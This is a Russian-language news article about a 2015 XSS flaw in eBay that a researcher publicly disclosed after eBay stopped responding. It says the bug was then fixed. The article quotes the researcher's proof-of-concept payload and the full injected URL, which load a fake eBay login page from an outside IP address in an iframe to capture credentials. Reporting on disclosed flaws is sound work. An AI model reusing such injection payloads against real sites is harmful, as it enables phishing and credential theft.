Независимый исследователь, известный под псевдонимом MLT, обнаружил на eBay критическую уязвимость. Баг позволяет осуществить фишинговую атаку на пользователей интернет-аукциона и похитить их учетные данные.
MLT обнаружил опасную уязвимость еще 11 декабря 2015 года и тут же сообщил о ней в поддержку eBay. Сотрудники компании уточнили у исследователя некоторые детали, после чего перестали ему отвечать. MLT ждал ровно месяц, но за это время eBay так и не закрыл дыру, невзирая на ее опасность. Тогда исследователь решил, что публикация информации о баге может ускорить процесс его исправления, и обнародовал данные в своем блоге.
MLT нашел на eBay обычную XSS-уязвимость, но в масштабах большого ресурса даже банальный cross-site scripting — большая проблема. Чтобы проиллюстрировать возможные последствия, исследователь провел опыт: поместил iFrame-ссылку, ведущую на фишинговую страницу, в состав обычного URL аукциона. В итоге поддельная страница стала выглядеть легитимной, будто она на самом деле является частью eBay.
MLT создал фейковую страницу логина, которая в точности имитировала настоящую страницу логина eBay (не считая небольших странностей в URL-адресе, которые мало кто заметит). Для инъекции iFrame, содержащего ссылку на фишинговую страницу, исследователь использовал следующий пэйлоуд:
document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html” width=”1500″ height=”1000″>’)
Вот так выглядел URL во время инъекции:
http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
Когда все было сделано, MLT набрал на фейковой странице авторизации свои логин и пароль, получив в ответ ошибку. Тем не менее, его учетные данные в этот момент можно было перехватить в виде простого текста. В качестве proof-of-concept исследователь опубликовал видеозапись эксперимента.
В целом расчет MLT оказался верен. Как только информация об уязвимости была опубликована в сети, и пресса принялась донимать представителей eBay вопросами, баг спешно исправили.